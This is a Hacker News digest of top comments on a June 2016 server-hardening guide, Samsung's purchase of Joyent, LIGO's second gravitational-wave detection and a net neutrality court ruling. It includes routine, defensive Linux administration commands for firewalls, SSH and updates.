Hacker News with inline top comments - Best stories, 18 Jun 2016
1
My First 10 Minutes on a Server codelitt.com
1247 points by codelitt  2 days ago   284 comments top 58
1
brokenwren 2 days ago 8 replies      
This one is pretty decent but if you want the ultimate guide check out this one:

https://www.inversoft.com/guides/2016-guide-to-user-data-sec...

It covers 10x what all the other guides cover in terms of server and application security. It was posted a few weeks ago on HN but didn't make the front-page.

2
jldugger 2 days ago 6 replies      
> We don't even have a password for our root user. We'll want to select something random and complex.

So you're taking something secure by default -- no password means no login allowed, and making it less secure. And if you have hundreds of these servers, you'll need to rotate them whenever someone on the team leaves. This is painful.

Simple solution: leave root password blank, don't forget your sudo password. If you can't get in, use grub or a liveCD. Or tie auth to ldap or kerberos so you _can't_ forget. This is one area where Windows has a distinct advantage: AD more or less requires admins to think at the level of network of servers, and provides a baseline set of services always present.
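A minimal sketch of that approach (assuming a Debian-family box and a user already in the sudo group):

    # lock the root account's password entirely (no password login possible)
    sudo passwd -l root
    # confirm your own sudo access still works before you log out
    sudo -v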

3
malingo 2 days ago 2 replies      
This is good advice on achieving the most secure SSH configuration: https://stribika.github.io/2015/01/04/secure-secure-shell.ht...

"My goal with this post here is to make NSA analysts sad."

4
tjohns 2 days ago 3 replies      
> I check our logwatch email every morning and thoroughly enjoy watching several hundreds (sometimes 1000s) of attempts at gaining access with little prevail.

This is something that actually bugs me a bit. These attacks are so common, getting emails like this every day contributes to alarm fatigue. (https://en.wikipedia.org/wiki/Alarm_fatigue)

I'd love to see the Linux nightly security scripts replaced with something that only sends out emails when there's a specific actionable event I need to pay attention to. Ideally in a way that can easily be aggregated over all the machines I manage.

5
chrisfosterelli 2 days ago 1 reply      
> sudo ufw allow from {your-ip} to any port 22

I'm surprised nobody mentioned this is a great way to shoot yourself in the foot if you don't have a static IP.
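If you don't have a static IP, a safer pattern is rate-limiting instead of IP-pinning; a sketch (the subnet below is just a placeholder for a range you actually control):

    # ufw's "limit" blocks sources that open 6+ connections in 30 seconds
    sudo ufw limit 22/tcp
    # or allow a whole range you control instead of a single address
    sudo ufw allow from 203.0.113.0/24 to any port 22 proto tcp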

6
Someone1234 2 days ago 4 replies      
Why do people install fail2ban then disable password based authentication entirely? I legitimately don't understand the purpose.

Also, they complain about log spam (from failed SSH attempts); this is one reason to move SSH to a different port. It does NOT increase security, but it DOES reduce log spam from bots trying for easy targets.

7
ryanmarsh 2 days ago 14 replies      
I don't mean to sound flippant but why can't these "lock down your new box" tutorials just be a bash script? Shouldn't they be?
8
nblr 2 days ago 2 replies      
Fail2ban? sshguard? Unnecessary. Just disable ssh passwd auth (which is generally a good idea) -> done/done

If you don't like lognoise from ssh scanners (even if you disable passwd auth), move your sshd port to some random high port and make note of it in your ~/.ssh/config

Generally: if in doubt, take the simpler and more elegant solution to a problem.
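For example (4422 is an arbitrary choice; remember to open the new port in your firewall before restarting sshd):

    # /etc/ssh/sshd_config on the server
    Port 4422

    # ~/.ssh/config on your workstation
    Host myserver
        HostName myserver.example.com
        Port 4422
        User deploy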

9
teddyh 2 days ago 0 replies      
I prefer the Securing Debian Manual; it's an official manual from the Debian project.

https://www.debian.org/doc/manuals/securing-debian-howto/

10
p8donald 1 day ago 1 reply      
Since I changed the default SSH port from 22 to something else (like 4422), I no longer get any of these drive-by attacks and don't need fail2ban anymore.

I also like to set up a simple Monit configuration to alert me about high cpu usage or when the disk space is about to run out. Instead of emailing me these alerts (and also weekly reports) I've configured Monit to post them to my Slack team of 1.

https://peteris.rocks/blog/monit-configuration-with-slack/
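The CPU/disk checks are only a few lines of Monit config; a rough sketch (the Slack hookup itself is in the linked post, and the address here is a placeholder):

    set alert ops@example.com              # or route alerts through a Slack bridge
    check system $HOST
        if loadavg (5min) > 4 then alert
        if memory usage > 85% then alert
    check filesystem rootfs with path /
        if space usage > 85% then alert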

11
seagreen 2 days ago 1 reply      
Great tactical advice, but what a sad situation to be in. "Run this command, then run this command, then run this command ..."

There should be a single configuration file (or set of files) that declaratively describes the whole state of the machine. That way the exact situation of the server can be reviewed by just looking at files, instead of trying to poke and prod at the machine to see what commands have been run over the last X weeks.

12
raimue 2 days ago 2 replies      
Be aware fail2ban does not handle IPv6 at all with its default configuration on Debian/Ubuntu.

https://github.com/fail2ban/fail2ban/issues/1123

13
adrianmsmith 2 days ago 7 replies      
What's the reason for using a firewall?

Assuming that services which shouldn't be accessible to the outside only listen to localhost not the network (e.g. MySQL on a LAMP stack), isn't that sufficient?

(Honest question, I don't have much experience with sysadmin work.)
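One way to check that premise is to look at what is actually listening on non-localhost addresses; anything bound to 0.0.0.0 or [::] is reachable from outside, firewall aside:

    sudo ss -tulpn        # listening TCP/UDP sockets with owning processes
    # e.g. keep MySQL local in its config: bind-address = 127.0.0.1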

14
elbear 2 days ago 2 replies      
Here's an Ansible role (I made it) that automates the steps described in the article: https://github.com/LucianU/ansible-secure.
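Roles like this are applied with a short playbook; a minimal, untested sketch (the group name is a placeholder, the role name is taken from the linked repo):

    # site.yml
    - hosts: new_servers
      become: true
      roles:
        - ansible-secure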
15
walrus01 2 days ago 1 reply      
For those saying "why fail2ban?", fail2ban can be used for a great deal more than just watching the sshd log. You can activate fail2ban rules for apache and nginx which help significantly with small DDoS, turning spurious traffic/login attempts into iptables DROP rules. And a lot of other daemons.
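Enabling one of the stock web jails is a few lines in /etc/fail2ban/jail.local; a sketch (jail and filter names vary by fail2ban version):

    [nginx-http-auth]
    enabled  = true
    port     = http,https
    logpath  = /var/log/nginx/error.log
    maxretry = 5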
16
tobltobs 2 days ago 4 replies      
Can somebody help me out with this question: the default config for unattended-upgrades seems not to enable reboots, even when a reboot is required to activate the upgrades. Wouldn't that have made quite a few important upgrades of recent years ineffective if the server never got rebooted?
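For reference, the relevant knobs live in /etc/apt/apt.conf.d/50unattended-upgrades; something like this enables the reboot (the time value is just an example):

    Unattended-Upgrade::Automatic-Reboot "true";
    // optionally reboot at a quiet hour instead of immediately
    Unattended-Upgrade::Automatic-Reboot-Time "03:00";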
17
babuskov 2 days ago 1 reply      
> First we'll want to make sure that we are supporting IPv6

How does that help security?

18
jboynyc 2 days ago 2 replies      
I'm finding that another important step is this one:

apt-get install etckeeper && cd /etc && etckeeper init

Keeps your /etc under version control so you know what kinds of configuration changes you've perpetrated.
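Since etckeeper defaults to git on Debian/Ubuntu, ordinary git commands work for review, e.g.:

    sudo git -C /etc log --oneline     # what changed, and when
    sudo git -C /etc diff HEAD~1       # what the last change actually did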

19
rodolphoarruda 2 days ago 3 replies      
I'd be more curious to see a "My first 10 minutes on an Ubuntu desktop" version of the article.
20
tmaly 2 days ago 2 replies      
I have been meaning to write up a similar guide.

I would like to recommend using just iptables instead of ufw; I had a case on my VPS where an update to ufw failed and the firewall stopped working.

With iptables, install the iptables-persistent package so the rules are saved across restarts. Do not try to block entire countries' IP ranges, as this slows the machine down substantially.

fail2ban is great; I would recommend looking at some of your system logs to figure out new rules to add.
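A baseline along those lines (an untested sketch; adjust the port list to taste):

    sudo apt-get install iptables-persistent
    sudo iptables -A INPUT -i lo -j ACCEPT
    sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    sudo iptables -A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT
    sudo iptables -P INPUT DROP
    sudo netfilter-persistent save     # persist across reboots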

21
jtchang 2 days ago 3 replies      
Why don't they disable root logins with a password, period, and only allow SSH key authentication?

Also, if you put a passphrase on your SSH key, does that mean you have to enter it every time you want to SSH to the server (in order to unlock the key), or does it stay cached in most SSH clients (ssh on the Mac terminal, PuTTY on Windows, etc.)?

Isn't watching failed logins kind of useless? I think it is more important to see what successful logins were made.
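On the passphrase question: agents cache it, so you typically type it once per session, e.g.:

    eval "$(ssh-agent -s)"
    ssh-add ~/.ssh/id_rsa    # prompts for the passphrase a single time
    # macOS can also remember it in the keychain: ssh-add -K ~/.ssh/id_rsa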

22
drzaiusapelord 2 days ago 0 replies      
It's a tradition to nitpick these kinds of lists. Here's my take.

>I generally agree with Bryan that you'll want to disable normal updates and only enable security updates.

Hmm, I'm fairly certain that Ubuntu (and others) don't do major product updates or API-breaking updates via apt-get. You shouldn't have to worry about breaking anything if you use normal updates. This seems a bit too conservative to me, and it leads to the problem of being stuck on an ancient or buggy library and having to do the update manually later, usually after wasting a couple of hours googling why $sexy_new_application isn't working right on that server.

He set up an email alert, but not an SMTP server to actually send it. Also, OSSEC takes a few seconds to install and is much nicer than emailing full logs.

Lastly, fail2ban is becoming sysadmin snake oil / a fix-all. Its use is questionable in many circumstances, and there's a real chance of being locked out of your own server with it. If people are recommending it, they should at the very least be giving noob-friendly instructions for whitelisting your own IP.

23
taf2 2 days ago 2 replies      
Not sure if others feel this way, but adding this line to sudoers never felt right to me...

deploy ALL=(ALL) ALL

I usually instead limit the deploy user to a smaller subset of commands e.g. the init.d script to control a service.

Obviously, if someone gained access to the deploy user we're probably SOL anyway... but it just makes it seem safer... we have to log in as an ops user to install or update things on the boxes.
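That narrower grant looks something like this in /etc/sudoers.d/deploy (a sketch; "myapp" is a placeholder, and you should edit it with visudo -f):

    deploy ALL=(root) NOPASSWD: /etc/init.d/myapp start, /etc/init.d/myapp stop, /etc/init.d/myapp restart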

24
kikimeter 2 days ago 0 replies      
I created a script that does almost everything automatically using Ansible and Ansible Vault: https://github.com/guillaumevincent/Ansible-My-First-5-Minut...
25
catmanjan 2 days ago 1 reply      
One of the suggestions is to make sure your public key has the .pub extension, and they imply that if someone didn't include the extension they would be reprimanded - any reason for this in particular?
26
dawkins 2 days ago 2 replies      
I always worry that adding 2FA could make your machine inaccessible if anything happens to the second factor -- google-authenticator in this case. Maybe it's a little paranoid, but I don't like the idea of giving something else control over my ability to log in to my server.
27
amelius 2 days ago 2 replies      
For protecting against brute-force login attempts, I use sshguard [1]

I really think this should be installed by default on distros like Ubuntu.

[1] http://www.sshguard.net/

28
SadWebDeveloper 2 days ago 0 replies      
They forgot to check whether the server is backdoored. You would be surprised how many providers add backdoors and monitoring systems you don't need (I'm looking at you, AWS guys).
29
usaphp 2 days ago 1 reply      
> "You should never be logging on to a server as root."

Can someone explain to me: let's say I disabled password logins and only allow login via a key - what are the potential downsides of logging in as root?

30
Theodores 2 days ago 1 reply      
I would be annoyed by a cryptic Audi password. I would prefer 'BatteryHorseStaple' passwords. Anything I can't remember gets written on a Post-it note and put next to my screen with a label saying what it's for. This is my behaviour, and the problem with cryptic passwords is that there are others like me: willing to keep a good password secret, but not willing to be so secret about a clumsy password that is easy for a machine to crack but impossible to remember.
31
javajosh 2 days ago 0 replies      
It may be useful, at step 0, to get some basic orientation on the server. Which Linux is it (cat /etc/*-release)? How much RAM and disk (htop, df)? How is the filesystem set up (mount)? What packages are already installed (dpkg -l)? What processes are running (ps aux, htop)? What did the last root, including me, do (history)? I also like to know roughly where the box is physically (tracert, run locally).
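As a copy-pasteable version of roughly that checklist:

    cat /etc/*-release         # which distro
    df -h; free -m             # disk and memory
    mount                      # filesystem layout
    dpkg -l | less             # installed packages (Debian family)
    ps aux                     # running processes
    history                    # what the last root did, in this shell at least
    # and from your own machine, not the server:
    #   traceroute <server-ip> # rough idea of where the box lives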
32
archon810 2 days ago 2 replies      
My biggest concern with being on a VPS like Linode, once you're all done securing yourself and binding services to the local LAN IP, is an attack from within the network. The VPS you own is also accessible by others on the same subnet, contrary to what you might assume.

I'd love to see a ufw guide for whitelisting only your own internal IPs to be allowed access to any services for ultimate security.
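A rough sketch of that whitelist style (the addresses are placeholders; note that on a shared private subnet you want specific host IPs, not the whole range):

    sudo ufw default deny incoming
    sudo ufw allow from 192.168.140.10 to any port 5432 proto tcp
    sudo ufw allow from 192.168.140.11 to any port 5432 proto tcp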

33
bikamonki 1 day ago 0 replies      
Why not make a certified, secured, best-practice snapshot that covers 99% of this, and share it as one of the one-click installs that most VPS providers offer nowadays?
34
overcast 2 days ago 0 replies      
Very useful, most of this stuff is pretty common for anyone who has done any regular sysadmin work, but definitely good to have a checklist.
35
cleeus 2 days ago 3 replies      
echo "set background=dark" > /etc/vim/vimrc.local
36
VLM 2 days ago 2 replies      
Technically you don't need the root password; you can always do password recovery if you have access to the box. And how exactly did you lock yourself out of every account with sudo? Of course there's always "messed up my ldap or general network settings, can't log in to fix them". There's nothing wrong with setting your root password to a random string and throwing it away, after verifying your sudo works, I guess.

I will admit to being lazy, and with full automation it's faster to spawn a new virtual image and let ansible run its course than to do root password recovery, where you boot and tell the bootloader to make the init system /bin/sh and hand-edit /etc/shadow and /etc/passwd and then reboot again, etc etc. I mean, I can set up a new image almost as fast as I can reboot an old image, and I set up images a lot more often than I do password recovery, so...

Scrap the ssh commentary and set up ssh company wide as per stribika plus or minus local modifications:

https://stribika.github.io/2015/01/04/secure-secure-shell.ht...

"On large scale, you'll be better off with a full automated setup using something like Ansible"

At ANY scale you're better off, unless you're experimenting or time isn't money. Documenting and testing what you do by hand takes longer than convincing Ansible to do it for you, and if you don't document or test you're just doomed, so it's not like you can avoid that effort. With automation this is more like "first two minutes on a server", not ten.

Some people like to drop a .forward in root's homedir sending mail to your sysadmin mailing list or yourself. I THINK, but might be wrong, that if you do that you don't have to tell logwatch whom to email; it'll go to root and then forward to the right people. More than just logwatch assumes root@something.whatever exists as an email address.

You're also missing setting up your centralized rsyslog or local equivalent, and your munin/nagios/zabbix or local equivalent... I still configure zabbix by hand because I'm old-fashioned, but it's possible to automate that.

NTP is also missing. You can make Kerberos a very sad-faced puppy if time isn't synced, and it's easy to set NTP up to point at local trusted servers.

(Note: a post that's nothing but complaining still means the linked article is at least 99.9% correct; it is a nicely written, wide-ranging TODO list.)
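The .forward and NTP suggestions above are both one-liners (assuming a working local MTA; the address is a placeholder):

    echo 'ops@example.com' > /root/.forward
    sudo apt-get install ntp    # or chrony/systemd-timesyncd, pointed at trusted servers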

37
thatusertwo 2 days ago 0 replies      
I have a VPS; when I first got it, it had an additional user set up for some unknown reason. I didn't know it was there until my server was hacked by a bot. I'd suggest adding a step of checking the /home directory (and other places) to make sure no 'unknown' accounts have been set up.
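A quick way to do that check (a sketch; it lists accounts with login-capable shells):

    awk -F: '$7 !~ /(nologin|false)$/ {print $1, $3, $6, $7}' /etc/passwd
    ls -la /home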
38
timroy 2 days ago 0 replies      
Thanks for this article - very clear, well-motivated, and concise. I'm saving this for myself and others.
39
windsurfer 2 days ago 1 reply      
I guess I'm a pretty big noob, but why do people so strongly recommend password-protecting your private key? Losing it pretty much dooms you whether or not it's password protected. It might buy you a few hours to react and invalidate the public key, I guess...
40
dmourati 1 day ago 0 replies      
Anyone remember Bastille Linux? https://help.ubuntu.com/community/BastilleLinux
41
feross 2 days ago 0 replies      
This is very similar to my "How To Set Up Your Linode For Maximum Awesomeness" guide:

http://feross.org/how-to-setup-your-linode/

42
agentgt 2 days ago 0 replies      
It might be nice if there were some cloud-vendor-specific addenda. For example, on Rackspace you almost always want to install the monitoring daemon (it's actually fairly decent and has a small footprint).
43
z3t4 2 days ago 0 replies      
If you open up access from/to port 80 or 443, you also open up access to all trojans/spyware/telemetry/auto-update created in the last ten years. You'll want to limit access per user and process.
44
chrisper 2 days ago 0 replies      
Instead of using unattended-upgrades, I prefer to subscribe to mailing lists and see when there are new security updates.

One could combine that with something like Rundeck, where you run apt-get upgrade.

45
a_imho 2 days ago 1 reply      
I think 2FA is generally bad practice, and it's quite sad that it is ubiquitous in e.g. banking and that people try to shove it everywhere. It is analogous to password rules (8-14 characters, numbers, capital letters and other symbols), yet it is very rare that you can use a 40+ character passphrase. It gives a false sense of added security while being annoying at the same time, imo. It is very common, for me at least, not to have access to my phone, because I left it at home, in the car, etc. Not to mention that if you lose it (or someone steals it) you have a huge PITA to deal with.
46
PerfectElement 2 days ago 0 replies      
Is there a similar guide for Windows servers out there?
47
Hello71 2 days ago 0 replies      
1. useradd -m deploy

2. "PasswordAuthentication no" probably won't work as you expect if UsePAM is on.

48
ec109685 2 days ago 4 replies      
It would be useful to discuss what prevents the server from being rooted without a trace during the 10 minutes it takes to execute these steps.
49
mmgutz 2 days ago 1 reply      
Hmmm ... why does root need a password? `sudo su`
50
brndnmg 2 days ago 1 reply      
May I suggest Ansible (or whatever other provisioning tool)? You can subtract 9+ minutes from the title...
51
dewarrn1 2 days ago 0 replies      
Nice guide, better comments, leaving this here for later reference.
52
cfieber 2 days ago 0 replies      
Sure makes me glad all that (and so much more) happens in the first negative 10 minutes on any server I deploy.

If you are doing this after your server has launched, you are doing it wrong.

53
stonogo 2 days ago 1 reply      
No production server should ever be manually configured.
54
tdalaa 2 days ago 0 replies      
Pretty useful, thanks
55
plusbryan 2 days ago 1 reply      
What was wrong with 5 minutes? :-)
56
ck2 2 days ago 0 replies      
Don't just change SSH key requirements, also change SSH port.

Port 22 is possibly the most heavily scanned port around.

57
nanis 2 days ago 0 replies      
Sigh ... "principal of least privilege"
58
YngwieMalware 2 days ago 1 reply      
I used this article for a couple of years when I was a Linux server neophyte, and now some of these things seem obvious to me. A good article for total noobs.
2
Samsung Acquires Joyent joyent.com
777 points by yunong  2 days ago   231 comments top 35
1
urza 1 day ago 7 replies      
Cloud orchestration, Container Orchestration, Kubernetes... I think I am getting old and starting to understand how my parents feel about technology.

I am a developer, but I mostly work on desktop apps or embedded devices, or lately on some MVC applications. But reading things like

"A Container-Native Stack for Modern Applications and Operations. Increase development velocity while simplifying operations."

I have no idea what I should imagine or what it is good for...

Any good introduction or explanation of what it is they actually do?

2
bcantrill 2 days ago 18 replies      
In case anyone's curious, I blogged about the backstory of the acquisition.[1] tl;dr: We at Joyent are elated, and we believe that this will be a huge win for our customers, for our technologies and for the communities that they serve!

[1] https://www.joyent.com/blog/samsung-acquires-joyent-a-ctos-p...

3
cpprototypes 2 days ago 5 replies      
Samsung is a typical Asian electronics company (it has a hardware-focused history and is very good at it, but doesn't understand or respect software). I'm so glad that node.js is not under Joyent's control.
4
knurdle 1 day ago 4 replies      
Hey, maybe Joyent can finally afford to refund the people who supported it when it was TextDrive and then went back on their word! Snarky, I know, but I'm still bitter about how it was all handled...
5
sintaxi 2 days ago 1 reply      
Hats off, Samsung. You have just acquired a truly world-class engineering team.

Congrats to all my former colleagues who are absolutely amazing at their jobs and wonderful people to work with. Samsung looks like a very good match. Hope the transition goes well.

6
a_small_island 1 day ago 0 replies      
Joyent raised over $125M in venture funding [0], and there's no mention of a price? Wonder how the employees fared in this...

[0] https://www.crunchbase.com/organization/joyent

7
Negative1 2 days ago 3 replies      
Forgive my ignorance but can someone explain how Joyent's acquisition moves Samsung towards their strategic objectives? In other words, how are they going to exploit this technology (and brain gain)?
8
hitr 2 days ago 3 replies      
I always thought Microsoft/Google or the like would acquire Joyent, as it's a good product fit. Microsoft chose LinkedIn instead :) For Samsung this is all about IoT. Samsung wants to own both the devices and the backend. A good move, IMHO.
9
ruffrey 2 days ago 3 replies      
Luckily they did not acquire Node.js

edit: I should have been more specific... when an open source project is under a company's wing and that company gets acquired, you don't know what can happen, even under MIT. Look at Express recently. Since it's under the Node Foundation now, this is not a big deal. Had it happened a short time ago, there might have been further turmoil in the community.

10
yangtheman 1 day ago 0 replies      
As a Korean American who also has worked at Samsung headquarters, I think it's more of bad news than good news, no matter how Joyent wants to spin it.

Its corporate culture only allows the most cunning, politically savvy person to stay alive and move up the rank, and thus most executives (all if I limit it to small sample of executives I've personally met) fit that model.

And shit flows downwards: goals/promises set by them get pushed down, and engineers have to carry the burden.

It doesn't help that Korean society is very hierarchical and based on Confucian principles, where you don't usually challenge older persons and/or someone higher in rank. This is one example that describes a serious problem - http://thediplomat.com/2013/07/asiana-airlines-crash-a-cockp....

For those of you who are intrigued and have time, I suggest watching Misaeng with English subtitles (https://www.viki.com/tv/20812c-incomplete-life). Samsung isn't as bad, but the same hierarchy, verbal abuse, social dynamics, and strict rules on paper format exist.

The best outcome would be if they leave Joyent's management and culture alone. But I doubt it.

I also have first-hand experience of them applying the same "consumer electronics" mentality to a completely different business that required high-touch sales.

There is no denying Samsung's success as a multi-billion-dollar international corporation. However, Samsung is only good at producing quality hardware at mass scale. It has not had success in any sort of software or services. Perhaps they are trying to expand beyond their strengths; I applaud that effort and they actually do need it, since it's only a matter of time before Chinese companies catch up and produce products of the same quality as Samsung, just as Samsung did to Sony. I hope it bears fruit. I hope they can allow Joyent to succeed and thrive, and learn from that.

I will see what happens next few years.

11
monatron 1 day ago 0 replies      
As I toil away on a node based project that is interfacing with Samsung's Artik platform (both the Artik 10 board and Artik Cloud) I finally decided to call it a night -- check HN real quick -- and discover that Samsung is buying the original stewards of node. I almost thought the lack of sleep was putting me into psychosis...
12
andrewwhartion 1 day ago 0 replies      
Well done guys on staying solvent longer than the market could stay irrational!
13
bobsil1 2 days ago 1 reply      
This is John Gruber's nightmare :) (worked at Joyent before Daring Fireball)
14
brotherjerky 2 days ago 2 replies      
So the biggest phone manufacturer now owns a lot of Node.js expertise. Hopefully that leads to more JS in mobile!
15
vermontdevil 2 days ago 1 reply      
Is this the same company that sponsored the development of Node JS?
16
leommoore 1 day ago 0 replies      
Best wishes to all at Joyent. Thanks for all your work in the community over the last few years, particularly with node.js. Hopefully Samsung will give you the resources and reach to go on to better things in future.
17
corv 1 day ago 0 replies      
"Joyent will operate as a standalone company under Samsung and continue providing cloud infrastructure and software services to its customers"
18
ethbro 2 days ago 2 replies      
So this is the moment where everyone with a sufficient device / install marketshare decides they need to buy cloud expertise?

"Samsung will immediately benefit from having direct access to Joyents technology, leadership and talent. Likewise, Joyent will be able to take advantage of Samsungs scale of business, global footprint, financial muscle and its brand power."

19
subway 1 day ago 2 replies      
SmartOS will be on ARM within 12 months. Calling it.
20
alrs 1 day ago 0 replies      
This is great news for on-prem object storage. I look forward to seeing how big Samsung is able to go with Manta.
21
d2ncal 1 day ago 0 replies      
If anyone has a good background, what exactly does Joyent have that is so valuable?

It seems that NodeJS has moved out of Joyent. They have hosted container support that seems to run on Solaris, which seems interesting, but their website is a bit too buzzwordy.

I am not very familiar with this, so it would be great if someone could explain a little. I've read the comments about orchestration, but I'm more interested in Joyent's value proposition.

22
unixhero 1 day ago 0 replies      
Congrats Bryan.

If anybody deserves it, it's you guys.

23
hoodoof 2 days ago 0 replies      
I wonder how much for.
24
bogomipz 1 day ago 0 replies      
I'm sorry but how is this a good fit? What is the synergy here? This particular sentence is incredibly vapid:

"By bringing these two companies together we are creating the opportunity to develop and bring to market vertically integrated mobile and IoT services and solutions that deliver extraordinary simplicity and value to our customers."

25
OhHeyItsE 1 day ago 0 replies      
Can anyone shed some light (speculate, perhaps) on Samsung's strategy here? Just seems like an odd pairing to me.
26
ChrisArchitect 1 day ago 0 replies      
Wow, Joyent. Took me a bit to remember what they were doing in the early, early days, since we're multiple generations of pivots and focus-shifts on now... but it was TextDrive/Textile/Textpattern CMS. Ha. Different times. At least some of that is still out there in OSS land.
27
sidcool 1 day ago 0 replies      
I wonder what Samsung would gain from an IaaS kind of company. Do they have an IaaS product? Or is it for internal use?
28
carapace 1 day ago 0 replies      
(Thin sans-serif body text means you hate your readers.)
29
st3v3r 11 hours ago 0 replies      
Well that sucks. They had a good run, but Samsung's business culture is probably going to ruin them. Just check out some of the stories of their internal software engineering process.
30
crudbug 1 day ago 0 replies      
Next up some SmartOS desktop / mobile builds
31
beaugunderson 1 day ago 0 replies      
One company with all-male board & management team buys another company with all-male board & management team.
32
caffed 1 day ago 0 replies      
Ok... Let's start on iojs 7!
33
mattbettinson 2 days ago 3 replies      
Thought this said Joylent. Was confused.
34
krakensden 2 days ago 2 replies      
Good luck on your incredible journey.
35
ClassyPuff 1 day ago 0 replies      
Great news and good acquisition as well. Great work Samsung!!!!!
3
Second Gravitational Wave Detected at LIGO aps.org
614 points by specialp  2 days ago   172 comments top 23
1
lpage 2 days ago 5 replies      
For those curious about the future of LIGO...

At present there are two LIGO facilities - one in Hanford, Washington and another in Livingston, Louisiana. This is necessary for both denoising (it's unlikely that a seismic event or random perturbation would affect both simultaneously) and triangulation via parallax.

Right now having just two facilities (that are relatively close together) limits localization to broad regions of the sky. Additional facilities are under way/in discussion for Europe, Japan, and India. This would significantly improve both the sensitivity of the array and its ability to localize events in a smaller region of the sky. Hopefully these projects get funded. LIGO stands to resolve some of the biggest open questions we have in cosmology.

2
rubidium 2 days ago 0 replies      
"It is very significant that these black holes were much less massive than those observed in the first detection, Gabriela Gonzalez, LIGO's spokesperson, said in a statement. Because of their lighter masses compared to the first detection, they spent more timeabout one secondin the sensitive band of the detectors. It is a promising start to mapping the populations of black holes in our Universe."

from http://arstechnica.com/science/2016/06/ligo-data-includes-at...

3
noselfrighteous 39 minutes ago 0 replies      
I have a side question: if gravity (i.e. the warping of spacetime) propagates at the speed of light, does that mean the Alcubierre warp drive is fundamentally incapable of supra-light speeds?
4
yread 2 days ago 5 replies      
My wife has this really stupid (or brilliant?) question - if, during the collision, one solar mass turned into gravitational waves, is it possible to create mass from gravitational waves?
5
macintux 2 days ago 0 replies      
The article linked from that page is more useful to the physics-challenged such as myself: http://link.aps.org/doi/10.1103/Physics.9.68
6
BenoitP 2 days ago 4 replies      
How come: 14.2 + 7.5 == 21.7 != 20.8 ?

Does the gravitational wave contain 0.9 solar masses of energy?
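Back-of-the-envelope, if the missing 0.9 solar masses did go out as radiation:

    E = Δm·c² ≈ 0.9 × (1.99×10^30 kg) × (3.0×10^8 m/s)² ≈ 1.6×10^47 J

which is roughly the Sun's entire output sustained for ~10^13 years.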

7
nonbel 2 days ago 3 replies      
This signal was reported on months ago. Can anyone explain what they did to move the GW151226 signal from 2-sigma to >5-sigma?

"The data is in fact completely open and you could analyse it yourself! In addition to the GW150914 event there are also two others that rise somewhat above the background ("GW151012" and "GW151226"). You can see them by eye in the above plot. They are clearly not statistically significant enough to announce a discovery alone, but still they are tantalising... with room for improvement to design sensitivity (by a factor of ~2 which increases the spatial reach by 2^3) and the construction of a third detector in India to triangulate the signal, the future of gravitational wave astronomy is exciting."http://syymmetries.blogspot.com/2016_03_01_archive.html

8
devy 2 days ago 5 replies      
Can someone who has expertise explain the significance of this in plain English please?
9
kirykl 2 days ago 0 replies      
10
mudil 2 days ago 3 replies      
When gravitational waves are released from the merger of two black holes, the combined mass of the resultant black hole is less than the sum of its component black holes, because some of the mass was released in the form of gravitational waves.

Questions.

What are the implications of this for black hole entropy and temperature? Can black holes evaporate from gravitational radiation alone, without Hawking radiation?

What are the implications of this for the mass of any object in the universe, since all objects are related to each other gravitationally and the universe is expanding? Does it mean objects are constantly losing mass and the universe is filled with energy from this release? Can dark energy be related to this process? Can the universe be expanding because matter is constantly lost to gravitational waves?

What are the implications of gravitational waves on the fabric of spacetime, if objects are constantly leaking gravitational waves in a nonstatic universe?

11
eaq 2 days ago 0 replies      
Data and audio files relevant to this event are available to the public at https://losc.ligo.org/events/GW151226/

There are also Jupyter tutorials on processing GW signals at https://losc.ligo.org/tutorials/

12
cyphar 2 days ago 0 replies      
I was lucky enough to be in an astrophysics faculty (doing a research project) when the LIGO paper was published. Everyone was super excited and was printing off papers and discussing the experiment, results and future of astronomy. It was really something else to see that many clever minds so excited about a result that many scientists involved in the field of cosmology and relativity didn't live to see.
13
Jerry2 2 days ago 3 replies      
How do we know that these waves they're detecting are from collisions of black holes? How do they locate these black holes, and how do they conclude that what they detect is coming from black holes Alpha and Beta colliding?
14
etrautmann 2 days ago 2 replies      
Interesting to note that the y-scale on figure 1 is 10^-21 (units of strain). Measurement at that scale is absolutely insane. The power of good engineering, incredible optics, and lots of averaging.
15
ars 2 days ago 3 replies      
Something I've asked before but got no answer - at these extreme masses, velocities, and forces, time dilation has got to be immense.

Yet the article makes no mention of this whatsoever.

16
an_account_name 2 days ago 0 replies      
So, I remember hearing about LIGO when the first wave was detected, and was excited by it - but I had never heard of it before that.

What other experiments are running that would generate similar excitement from the science community that I probably haven't heard of yet?

17
JumpCrisscross 2 days ago 0 replies      
One of my favourite things to do, when I'm back in California, is attend SLAC Public Lectures [1]. (There is a disturbing paucity of scientific cultural institutions in New York.) The most recent one was by Dr. Brian Lantz about LIGO [2].

[1] https://www6.slac.stanford.edu/community/public-lectures.asp...

[2] https://www.youtube.com/watch?v=EMzoQAmK8Dc

18
heegemcgee 2 days ago 2 replies      
> The signal persisted in the LIGO frequency band for approximately 1 s, increasing in frequency and amplitude over about 55 cycles from 35 to 450 Hz

Would love to hear an audio facsimile of what this might "sound" like.

20
scrumper 2 days ago 2 replies      
What does the last line of the abstract refer to, about "deviations from general relativity"? Is it simply a statement that this (and other) observations of gravity waves are another tool for verifying GR's predictions?
21
ksec 1 day ago 0 replies      
How far are we from creating Gravity Shockwave Generating Division Tool? A.k.a Goldion Crusher.
22
jayess 2 days ago 2 replies      
Could black holes lose their mass through the propagation (generation?) of gravitational waves?
23
peter303 2 days ago 0 replies      
I thought the shaking was Santa on the roof!
4
Appeals court upholds FCC's net neutrality order politico.com
588 points by textdog  3 days ago   262 comments top 15
1
grellas 3 days ago 28 replies      
How we got to the point where utility-style regulation is seen as the key to ensuring a free and open internet is a true puzzle.

Utility-style regulation gives regulators plenary authority over the internet - meaning full and complete. Their power to do this or to forbid that is highly discretionary and essentially boundless.

This in turn gives a gatekeeper role to the regulators: you play by their rules or you don't play. And that means they have final say over what happens across the internet, at least within U.S. jurisdiction.

So today they say net neutrality rules.

Tomorrow maybe it is price controls in the name of consumer fairness. Or maybe it is mandated compliance with government snooping orders in the name of national security. Or who knows what not?

Why not? With a utility-style regulatory framework, you essentially have a form of administrative law run wild, legally speaking. Standards are exceedingly vague, power is wildly broad, and (in the end) he who has the most power and pull to control the regulators winds up having the final say over what the law is or is not as it affects the internet.

This is the exact antithesis of the largely hands-off idea of what the government could do with respect to the internet over the past several decades.

Of course law tends to conform in the short term to what people want and, today, most people truly do want a free and open internet. Therefore, the risk of any existential threat to internet freedom is either minimal or non-existent in the short term.

